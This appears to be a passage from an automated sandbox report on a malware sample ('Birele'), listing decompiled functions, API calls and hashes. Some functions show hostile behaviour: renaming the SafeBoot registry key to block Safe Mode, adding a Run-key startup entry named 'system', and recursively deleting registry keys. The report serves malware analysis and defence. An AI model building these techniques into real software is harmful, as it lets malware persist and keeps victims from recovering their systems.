                                                                                                                                                  				_push(_t9);
                                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                                  					 *(_t9 + 0x37) =  *(_t9 + 0x37) & 0x000000fe;
                                                                                                                                                  					ShowWindow(_t16, 0);
                                                                                                                                                  					return  *0x418104();
                                                                                                                                                  				} else {
                                                                                                                                                  					 *0x418104();
                                                                                                                                                  					_pop(_t14);
                                                                                                                                                  					_t15 = ShowWindow( *(_t14 + 0x1c), 5); // executed
                                                                                                                                                  					return _t15;
                                                                                                                                                  				}
                                                                                                                                                  			}








                                                                                                                                                  0x004076a4
                                                                                                                                                  0x004076a4
                                                                                                                                                  0x004076aa
                                                                                                                                                  0x004076ac
                                                                                                                                                  0x004076ac
                                                                                                                                                  0x004076ac
                                                                                                                                                  0x004076ac
                                                                                                                                                  0x004076b0
                                                                                                                                                  0x004076b3
                                                                                                                                                  0x004076b5
                                                                                                                                                  0x004076b6
                                                                                                                                                  0x004076ca
                                                                                                                                                  0x004076d1
                                                                                                                                                  0x004076dd
                                                                                                                                                  0x004076b8
                                                                                                                                                  0x004076b8
                                                                                                                                                  0x004076be
                                                                                                                                                  0x004076c4
                                                                                                                                                  0x004076c9
                                                                                                                                                  0x004076c9

                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00407751,?,004079F5), ref: 004076C4
                                                                                                                                                  • ShowWindow.USER32(00000000,00000000,?,004083F7,00000000,00407ABF,?,00406137,00407716,?,?,00407751,?,004079F5), ref: 004076D1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ShowWindow
                                                                                                                                                  • String ID: D\@
                                                                                                                                                  • API String ID: 1268545403-3892359110
                                                                                                                                                  • Opcode ID: 0f37c24e6feef92659671b6ae8c71a02bc8bfd50d24285b9b6259690f18bf173
                                                                                                                                                  • Instruction ID: ec1750e1b10e8a368bb44e678b50c6d7f3447b465052546ed2b7411cfa354201
                                                                                                                                                  • Opcode Fuzzy Hash: 0f37c24e6feef92659671b6ae8c71a02bc8bfd50d24285b9b6259690f18bf173
                                                                                                                                                  • Instruction Fuzzy Hash: A6E0DF70418B50AECB106B34CDDCF633E00AB01330F514AF9E052AB0F2CA7E94058B1E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00416AF0(void* __eax, void* __eflags) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __ecx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				void* _t25;
                                                                                                                                                  				intOrPtr _t35;
                                                                                                                                                  				void* _t37;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                  
                                                                                                                                                  				_t25 = __eax;
                                                                                                                                                  				_v8 = E004150EC(1);
                                                                                                                                                  				_push(0x416b7a);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t40;
                                                                                                                                                  				E0041518C(_v8, 0x80000002);
                                                                                                                                                  				E004152D0(_v8, _t25, 1, "SYSTEM\\CurrentControlSet\\Control", _t38); // executed
                                                                                                                                                  				_t42 = _t25;
                                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                                  					E00415D0C(_v8, "SafeBoot", "SystemNls", _t37, __eflags, 1);
                                                                                                                                                  					E00402EF8(_v8);
                                                                                                                                                  				} else {
                                                                                                                                                  					E00415D0C(_v8, "SystemNls", "SafeBoot", _t37, _t42, 1); // executed
                                                                                                                                                  					E00402EF8(_v8);
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t35);
                                                                                                                                                  				 *[fs:eax] = _t35;
                                                                                                                                                  				return 0;
                                                                                                                                                  			}














                                                                                                                                                  0x00416af7
                                                                                                                                                  0x00416b05
                                                                                                                                                  0x00416b0b
                                                                                                                                                  0x00416b10
                                                                                                                                                  0x00416b13
                                                                                                                                                  0x00416b1e
                                                                                                                                                  0x00416b2d
                                                                                                                                                  0x00416b32
                                                                                                                                                  0x00416b34
                                                                                                                                                  0x00416b63
                                                                                                                                                  0x00416b6b
                                                                                                                                                  0x00416b36
                                                                                                                                                  0x00416b45
                                                                                                                                                  0x00416b4d
                                                                                                                                                  0x00416b4d
                                                                                                                                                  0x00416b72
                                                                                                                                                  0x00416b75
                                                                                                                                                  0x00000000

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                  • String ID: SYSTEM\CurrentControlSet\Control$SafeBoot$SystemNls$dPA
                                                                                                                                                  • API String ID: 2976201327-1433115898
                                                                                                                                                  • Opcode ID: 716e7242211e8ba7b4ef8ad312a81c7c178b5fa3d13c607168e58978dc7bb9e1
                                                                                                                                                  • Instruction ID: 57d4b4f8c09642b4eb9741871bfe027d7f06fb12f2089bea81cf561b24dce8cb
                                                                                                                                                  • Opcode Fuzzy Hash: 716e7242211e8ba7b4ef8ad312a81c7c178b5fa3d13c607168e58978dc7bb9e1
                                                                                                                                                  • Instruction Fuzzy Hash: 8701C031308214EBD300EB55E8429CDB7A8EB80318B228077F500DB691D77ABE80A75C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                  			E004153F4(intOrPtr __eax, void* __ebx, void* __edx, void* __esi) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				int _v12;
                                                                                                                                                  				char _v13;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				intOrPtr _v56;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				char _v64;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				char* _t53;
                                                                                                                                                  				long _t56;
                                                                                                                                                  				long _t71;
                                                                                                                                                  				long _t80;
                                                                                                                                                  				void* _t90;
                                                                                                                                                  				int _t93;
                                                                                                                                                  				intOrPtr _t106;
                                                                                                                                                  				intOrPtr _t110;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                  
                                                                                                                                                  				_t116 = __esi;
                                                                                                                                                  				_t118 = _t119;
                                                                                                                                                  				_t120 = _t119 + 0xffffffc4;
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_v64 = 0;
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_t90 = __edx;
                                                                                                                                                  				_v8 = __eax;
                                                                                                                                                  				_push(_t118);
                                                                                                                                                  				_push(0x41555d);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t120;
                                                                                                                                                  				E00403A44( &_v20, __edx);
                                                                                                                                                  				_v13 = E00415080(_v20);
                                                                                                                                                  				if(_v13 == 0) {
                                                                                                                                                  					E00403ED8( &_v20, 1, 1);
                                                                                                                                                  				}
                                                                                                                                                  				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                  				_t51 = E00415774(_v8, _t90, _t90, _t116); // executed
                                                                                                                                                  				_v32 = _t51;
                                                                                                                                                  				_t122 = _v32;
                                                                                                                                                  				if(_v32 == 0) {
                                                                                                                                                  					_t53 = E00403E38(_v20);
                                                                                                                                                  					_t56 = RegDeleteKeyA(E004151DC(_v8, _v13), _t53); // executed
                                                                                                                                                  					_t56 = 0;
                                                                                                                                                  					_pop(_t106);
                                                                                                                                                  					 *[fs:eax] = _t106;
                                                                                                                                                  					_push(E00415564);
                                                                                                                                                  					E004039AC( &_v64);
                                                                                                                                                  					return E004039D0( &_v24, 2);
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t118);
                                                                                                                                                  					_push(0x415514);
                                                                                                                                                  					_push( *[fs:eax]);
                                                                                                                                                  					 *[fs:eax] = _t120;
                                                                                                                                                  					E004151F0(_v8, _v32);
                                                                                                                                                  					if(E0041558C(_v8,  &_v60, _t122) != 0) {
                                                                                                                                                  						E00403A9C( &_v24, _v56 + 1, 0);
                                                                                                                                                  						_t93 = _v60 - 1;
                                                                                                                                                  						if(_t93 >= 0) {
                                                                                                                                                  							do {
                                                                                                                                                  								_v12 = _v56 + 1;
                                                                                                                                                  								_t80 = RegEnumKeyExA(_v32, _t93, E00403E38(_v24),  &_v12, 0, 0, 0, 0); // executed
                                                                                                                                                  								if(_t80 == 0) {
                                                                                                                                                  									E00403BA4( &_v64, E00403E38(_v24));
                                                                                                                                                  									E004153F4(_v8, _t93, _v64, _t116); // executed
                                                                                                                                                  								}
                                                                                                                                                  								_t93 = _t93 - 1;
                                                                                                                                                  							} while (_t93 != 0xffffffff);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_pop(_t110);
                                                                                                                                                  					 *[fs:eax] = _t110;
                                                                                                                                                  					_push(0x41551b);
                                                                                                                                                  					E004151F0(_v8, _v28);
                                                                                                                                                  					_t71 = RegCloseKey(_v32); // executed
                                                                                                                                                  					return _t71;
                                                                                                                                                  				}
                                                                                                                                                  			}


























                                                                                                                                                  0x004153f4
                                                                                                                                                  0x004153f5
                                                                                                                                                  0x004153f7
                                                                                                                                                  0x004153fa
                                                                                                                                                  0x004153fd
                                                                                                                                                  0x00415400
                                                                                                                                                  0x00415403
                                                                                                                                                  0x00415406
                                                                                                                                                  0x00415408
                                                                                                                                                  0x0041540d
                                                                                                                                                  0x0041540e
                                                                                                                                                  0x00415413
                                                                                                                                                  0x00415416
                                                                                                                                                  0x0041541e
                                                                                                                                                  0x0041542b
                                                                                                                                                  0x00415432
                                                                                                                                                  0x00415441
                                                                                                                                                  0x00415441
                                                                                                                                                  0x0041544c
                                                                                                                                                  0x00415454
                                                                                                                                                  0x00415459
                                                                                                                                                  0x0041545c
                                                                                                                                                  0x00415460
                                                                                                                                                  0x0041551e
                                                                                                                                                  0x00415530
                                                                                                                                                  0x0041553a
                                                                                                                                                  0x0041553c
                                                                                                                                                  0x0041553f
                                                                                                                                                  0x00415542
                                                                                                                                                  0x0041554a
                                                                                                                                                  0x0041555c
                                                                                                                                                  0x00415466
                                                                                                                                                  0x00415468
                                                                                                                                                  0x00415469
                                                                                                                                                  0x0041546e
                                                                                                                                                  0x00415471
                                                                                                                                                  0x0041547a
                                                                                                                                                  0x0041548c
                                                                                                                                                  0x00415497
                                                                                                                                                  0x0041549f
                                                                                                                                                  0x004154a3
                                                                                                                                                  0x004154a5
                                                                                                                                                  0x004154a9
                                                                                                                                                  0x004154c6
                                                                                                                                                  0x004154cd
                                                                                                                                                  0x004154dc
                                                                                                                                                  0x004154e7
                                                                                                                                                  0x004154e7
                                                                                                                                                  0x004154ec
                                                                                                                                                  0x004154ed
                                                                                                                                                  0x004154a5
                                                                                                                                                  0x004154a3
                                                                                                                                                  0x004154f4
                                                                                                                                                  0x004154f7
                                                                                                                                                  0x004154fa
                                                                                                                                                  0x00415505
                                                                                                                                                  0x0041550e
                                                                                                                                                  0x00415513
                                                                                                                                                  0x00415513

                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00415514,?,00000000,0041555D), ref: 004154C6
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,0041551B,00000000,0041555D), ref: 0041550E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseEnum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2818636725-0
                                                                                                                                                  • Opcode ID: d6dec6ad87b9bb48edb1b6286cbdb4c5307ef8eea5445d6588dc9f7194a8fb47
                                                                                                                                                  • Instruction ID: 53bd9e7c38770a469da39ef08191287436f21e819fe24a67677f5adb3dce5017
                                                                                                                                                  • Opcode Fuzzy Hash: d6dec6ad87b9bb48edb1b6286cbdb4c5307ef8eea5445d6588dc9f7194a8fb47
                                                                                                                                                  • Instruction Fuzzy Hash: 41413270E00608EFDB00EFA5D982BDEB7B9EB88314F504576B414F7291D6389E458B58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 617 401624-401668 618 4016a6-4016ac 617->618 619 40166a-401674 618->619 620 4016ae-4016b5 618->620 621 401676 619->621 622 401678-40167c 619->622 621->622 623 401682-401684 622->623 624 40167e 622->624 625 4016a4 623->625 626 401686-401698 VirtualAlloc 623->626 624->623 625->618 626->625 627 40169a-4016a2 626->627 627->620
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00401624(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				void** _v24;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				void** _t16;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				signed int _t27;
                                                                                                                                                  				intOrPtr* _t29;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                                  
                                                                                                                                                  				_v24 = __ecx;
                                                                                                                                                  				 *_t32 = __edx;
                                                                                                                                                  				_t31 = __eax & 0xfffff000;
                                                                                                                                                  				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                                                                                  				 *_v24 = _t31;
                                                                                                                                                  				_t15 = _v20 - _t31;
                                                                                                                                                  				_v24[1] = _t15;
                                                                                                                                                  				_t29 =  *0x4195e4; // 0x642e7c
                                                                                                                                                  				while(_t29 != 0x4195e4) {
                                                                                                                                                  					_t17 =  *(_t29 + 8);
                                                                                                                                                  					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                                                                                  					if(_t31 > _t17) {
                                                                                                                                                  						_t17 = _t31;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t27 > _v20) {
                                                                                                                                                  						_t27 = _v20;
                                                                                                                                                  					}
                                                                                                                                                  					if(_t27 > _t17) {
                                                                                                                                                  						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                                                                                  						if(_t15 == 0) {
                                                                                                                                                  							_t16 = _v24;
                                                                                                                                                  							 *_t16 = 0;
                                                                                                                                                  							return _t16;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					_t29 =  *_t29;
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}












                                                                                                                                                  0x0040162b
                                                                                                                                                  0x0040162f
                                                                                                                                                  0x00401636
                                                                                                                                                  0x0040164b
                                                                                                                                                  0x00401653
                                                                                                                                                  0x00401659
                                                                                                                                                  0x0040165f
                                                                                                                                                  0x00401662
                                                                                                                                                  0x004016a6
                                                                                                                                                  0x0040166a
                                                                                                                                                  0x00401670
                                                                                                                                                  0x00401674
                                                                                                                                                  0x00401676
                                                                                                                                                  0x00401676
                                                                                                                                                  0x0040167c
                                                                                                                                                  0x0040167e
                                                                                                                                                  0x0040167e
                                                                                                                                                  0x00401684
                                                                                                                                                  0x00401691
                                                                                                                                                  0x00401698
                                                                                                                                                  0x0040169a
                                                                                                                                                  0x004016a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004016a0
                                                                                                                                                  0x00401698
                                                                                                                                                  0x004016a4
                                                                                                                                                  0x004016a4
                                                                                                                                                  0x004016b5

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401691
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                  • String ID: l.d$|.d
                                                                                                                                                  • API String ID: 4275171209-3003992340
                                                                                                                                                  • Opcode ID: f756fe2b4bf2f4490c772e984fe826dfacce7d8b813dad50ef75eca238e20777
                                                                                                                                                  • Instruction ID: ec70c602bd4316e153522ad771d77975271b5875b60273cfc83a9ee7ef7296fa
                                                                                                                                                  • Opcode Fuzzy Hash: f756fe2b4bf2f4490c772e984fe826dfacce7d8b813dad50ef75eca238e20777
                                                                                                                                                  • Instruction Fuzzy Hash: 23117072A046019FC3109F29CD80A5BBBE5EFC4750F19CA3EE598A73A4D636AC508A49
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 628 401490-40149d 629 4014a6-4014ac 628->629 630 40149f-4014a4 628->630 631 4014b2-4014ca VirtualAlloc 629->631 630->631 632 4014cc-4014da call 401344 631->632 633 4014ef-4014f2 631->633 632->633 636 4014dc-4014ed VirtualFree 632->636 636->633
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00401490(void* __eax, void** __edx) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void** _t8;
                                                                                                                                                  				void* _t11;
                                                                                                                                                  				long _t14;
                                                                                                                                                  
                                                                                                                                                  				_t8 = __edx;
                                                                                                                                                  				if(__eax >= 0x100000) {
                                                                                                                                                  					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t14 = 0x100000;
                                                                                                                                                  				}
                                                                                                                                                  				_t8[1] = _t14;
                                                                                                                                                  				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                                                                                                  				_t11 = _t3;
                                                                                                                                                  				 *_t8 = _t11;
                                                                                                                                                  				if(_t11 != 0) {
                                                                                                                                                  					_t3 = E00401344(0x4195e4, _t8);
                                                                                                                                                  					if(_t3 == 0) {
                                                                                                                                                  						VirtualFree( *_t8, 0, 0x8000);
                                                                                                                                                  						 *_t8 = 0;
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t3;
                                                                                                                                                  			}







                                                                                                                                                  0x00401493
                                                                                                                                                  0x0040149d
                                                                                                                                                  0x004014ac
                                                                                                                                                  0x0040149f
                                                                                                                                                  0x0040149f
                                                                                                                                                  0x0040149f
                                                                                                                                                  0x004014b2
                                                                                                                                                  0x004014bf
                                                                                                                                                  0x004014c4
                                                                                                                                                  0x004014c6
                                                                                                                                                  0x004014ca
                                                                                                                                                  0x004014d3
                                                                                                                                                  0x004014da
                                                                                                                                                  0x004014e6
                                                                                                                                                  0x004014ed
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004014ed
                                                                                                                                                  0x004014da
                                                                                                                                                  0x004014f2

                                                                                                                                                  APIs
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401799), ref: 004014BF
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401799), ref: 004014E6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                  • String ID: |.d
                                                                                                                                                  • API String ID: 2087232378-3815957579
                                                                                                                                                  • Opcode ID: 77a77d2dc0625b1740870d9dfa2a73a5d66441a28a53282cd84120034db7bed6
                                                                                                                                                  • Instruction ID: 79218588031a4a26cda0ae1425ca10e2fb9ad1666caba1eb793414810d07ccbf
                                                                                                                                                  • Opcode Fuzzy Hash: 77a77d2dc0625b1740870d9dfa2a73a5d66441a28a53282cd84120034db7bed6
                                                                                                                                                  • Instruction Fuzzy Hash: 22F0AE72B0062017D72059AA4DC1F5365D59F45750F154177FA08FF3E9D6794C054299
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00407AC4(void* __eax) {
                                                                                                                                                  				short _v32;
                                                                                                                                                  				signed int _t10;
                                                                                                                                                  				MSG* _t12;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				struct tagMSG* _t19;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				MSG* _t22;
                                                                                                                                                  
                                                                                                                                                  				_t15 = __eax;
                                                                                                                                                  				_t22 = _t21 + 0xffffffe0;
                                                                                                                                                  				_t19 = _t22;
                                                                                                                                                  				_t10 = PeekMessageA(_t19, 0, 0, 0, 1); // executed
                                                                                                                                                  				if(_t10 != 0) {
                                                                                                                                                  					if(_v32 != 0x12) {
                                                                                                                                                  						_t10 =  *((intOrPtr*)( *((intOrPtr*)(_t15 + 0x80))))();
                                                                                                                                                  						if(_t10 == 0) {
                                                                                                                                                  							_t12 = _t22;
                                                                                                                                                  							TranslateMessage(_t12); // executed
                                                                                                                                                  							_t10 = DispatchMessageA(_t12); // executed
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						 *0x4198a5 =  *0x4198a5 | _t19;
                                                                                                                                                  					}
                                                                                                                                                  					_t10 = _t10 & 0xffffff00 | _v32 != 0x00000000;
                                                                                                                                                  				}
                                                                                                                                                  				return _t10;
                                                                                                                                                  			}










                                                                                                                                                  0x00407ac5
                                                                                                                                                  0x00407ac6
                                                                                                                                                  0x00407ac9
                                                                                                                                                  0x00407ad3
                                                                                                                                                  0x00407ada
                                                                                                                                                  0x00407ae2
                                                                                                                                                  0x00407af5
                                                                                                                                                  0x00407af9
                                                                                                                                                  0x00407afb
                                                                                                                                                  0x00407aff
                                                                                                                                                  0x00407b04
                                                                                                                                                  0x00407b04
                                                                                                                                                  0x00407ae4
                                                                                                                                                  0x00407ae4
                                                                                                                                                  0x00407ae4
                                                                                                                                                  0x00407b0f
                                                                                                                                                  0x00407b0f
                                                                                                                                                  0x00407b16

                                                                                                                                                  APIs
                                                                                                                                                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00407AD3
                                                                                                                                                  • TranslateMessage.USER32 ref: 00407AFF
                                                                                                                                                  • DispatchMessageA.USER32 ref: 00407B04
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4217535847-0
                                                                                                                                                  • Opcode ID: b72a001ec0696afd76b19a0160fe4a25a6d2607575ec95731367a802bc4ac773
                                                                                                                                                  • Instruction ID: 04cd691bd0688bce4aa5f4e87f49b084e83cc56aed8ace428e2a74bf0d5574d3
                                                                                                                                                  • Opcode Fuzzy Hash: b72a001ec0696afd76b19a0160fe4a25a6d2607575ec95731367a802bc4ac773
                                                                                                                                                  • Instruction Fuzzy Hash: E5E0E450B0410156DF1557558C47A7F315CDB41368F14803EF4049B1C2DABDBC45B1B7
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E00416BE8(void* __ebx, void* __esi, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _t40;
                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                  
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(0);
                                                                                                                                                  				_push(_t45);
                                                                                                                                                  				_push(0x416c7f);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t45;
                                                                                                                                                  				 *0x419b10 = E004150EC(1);
                                                                                                                                                  				E0041518C( *0x419b10, 0x80000001);
                                                                                                                                                  				E004152D0( *0x419b10, 0x419b10, 1, "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", __esi); // executed
                                                                                                                                                  				E00406040(0,  &_v12);
                                                                                                                                                  				E00403BA4( &_v8, E00403E38(_v12));
                                                                                                                                                  				E0041566C( *0x419b10, _v8, "system");
                                                                                                                                                  				E0041515C( *0x419b10);
                                                                                                                                                  				E00402EF8( *0x419b10);
                                                                                                                                                  				_pop(_t40);
                                                                                                                                                  				 *[fs:eax] = _t40;
                                                                                                                                                  				_push(E00416C86);
                                                                                                                                                  				return E004039D0( &_v12, 2);
                                                                                                                                                  			}







                                                                                                                                                  0x00416beb
                                                                                                                                                  0x00416bed
                                                                                                                                                  0x00416bf7
                                                                                                                                                  0x00416bf8
                                                                                                                                                  0x00416bfd
                                                                                                                                                  0x00416c00
                                                                                                                                                  0x00416c0f
                                                                                                                                                  0x00416c18
                                                                                                                                                  0x00416c26
                                                                                                                                                  0x00416c30
                                                                                                                                                  0x00416c42
                                                                                                                                                  0x00416c51
                                                                                                                                                  0x00416c58
                                                                                                                                                  0x00416c5f
                                                                                                                                                  0x00416c66
                                                                                                                                                  0x00416c69
                                                                                                                                                  0x00416c6c
                                                                                                                                                  0x00416c7e

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$FileModuleNameOpen
                                                                                                                                                  • String ID: \SOFTWARE\Microsoft\Windows\CurrentVersion\Run$dPA$system
                                                                                                                                                  • API String ID: 3807207300-3666762942
                                                                                                                                                  • Opcode ID: c662102a57e3b0d022a4dca426026b12c36e29274dd09739ab254e7fd81c7bdb
                                                                                                                                                  • Instruction ID: 83b14a0d54c4074618b4fad308d97d1f78c8e4f92c33b452bb90d3c22a2f1eb1
                                                                                                                                                  • Opcode Fuzzy Hash: c662102a57e3b0d022a4dca426026b12c36e29274dd09739ab254e7fd81c7bdb
                                                                                                                                                  • Instruction Fuzzy Hash: D3019230700500ABD700EF6AC892BCD77E8EB8A308F614476F4009B395D67DBD44878D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
